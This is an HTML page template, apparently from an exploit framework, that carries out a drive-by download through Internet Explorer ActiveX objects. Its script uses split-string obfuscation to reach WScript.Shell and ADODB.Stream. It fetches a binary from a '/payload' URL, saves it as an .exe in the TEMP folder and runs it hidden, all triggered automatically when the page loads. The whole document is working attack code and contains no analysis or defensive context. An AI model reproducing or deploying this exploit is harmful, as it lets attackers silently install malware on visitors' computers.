<html><head><title></title>
<script language="javascript">

function #{var_func_createo}( o , n ) {
  var r = null;

  try { eval("r=o" + ".C" + "re" + "ate" + "Ob" + "je" + "ct(n)" ) }catch(e){}

  if (! r) {
    try { eval("r=o" + ".Cr" + "ea" + "teO" + "bj" + "ect(n,'')" ) }catch(e){}
  }

  if (! r) {
    try { eval("r=o" + ".Cr" + "ea" + "teO" + "bj" + "ect(n,'','')" ) }catch(e){}
  }

  if (! r) {
    try { eval("r=o" + ".Ge" + "tOb" + "je" + "ct('',n)" ) }catch(e){}
  }

  if (! r) {
    try { eval("r=o" + ".Ge" + "tOb" + "ject(n,'')" ) }catch(e){}
  }

  if (! r) {
    try { eval("r=o" + ".Ge" + "tOb" + "ject(n)" ) }catch(e){}
  }

  return( r );
}

function #{var_func_go}( a ) {

  var s = #{var_func_createo}( a, "W" + "Sc" + "ri" + "pt" + ".S" + "he" + "ll" );

  var o = #{var_func_createo}( a, "A" + "DO" + "D" + "B.S" + "tr" + "eam" );

  var e = s.Environment( "P" + "ro" + "ce" + "ss" );


  var url = document.location + '/p' + 'ay' + 'lo' + 'ad';
  var xml = null;
  var bin = e.Item( "T" + "E" + "M" + "P" ) + "\\\\#{var_exe_name}" + ".e" + "xe";
  var dat;

  try { xml=new XMLHttpRequest(); }
  catch(e) {
    try { xml = new ActiveXObject("Microsoft.XMLHTTP"); }
    catch(e) {
      xml = new ActiveXObject("MSXML2.ServerXMLHTTP");
    }
  }

  if (! xml) {
    return(0);
  }

  xml.open("GET", url, false);
  xml.send(null);
  dat = xml.responseBody;

  o.Type = 1 ;
  o.Mode = 3 ;
  o.Open ( ) ;
  o.Write ( dat ) ;
  o.SaveToFile ( bin, 2) ;

  s.Run ( bin , 0 );
}

function #{var_func_exploit}( ) {
  var i = 0;
  var t = new Array( #{var_objects} null );

  while (t[i]) {
    var a = null;

    if (t[i].substring(0,1) == '{') {
      a = document.createElement("object");
      a.setAttribute("cl" + "as" + "sid", "cl" + "s" + "id" +":" + t[i].substring( 1, t[i].length - 1 ) ) ;
    } else {
      try { a = new ActiveXObject(t[i]); } catch(e){}
    }

    if (a) {
      try {
        var b = #{var_func_createo}( a , "W" + "Sc" + "ri" + "pt" + ".S" + "he" + "ll" ) ;
        if (b) {
          #{var_func_go}( a ) ;
          return(0) ;
        }
      } catch(e){
      }
    }
    i++;
  }
}
</script>
</head>
<body onload='#{var_func_exploit}()'>
#{var_html}
</body>
</html>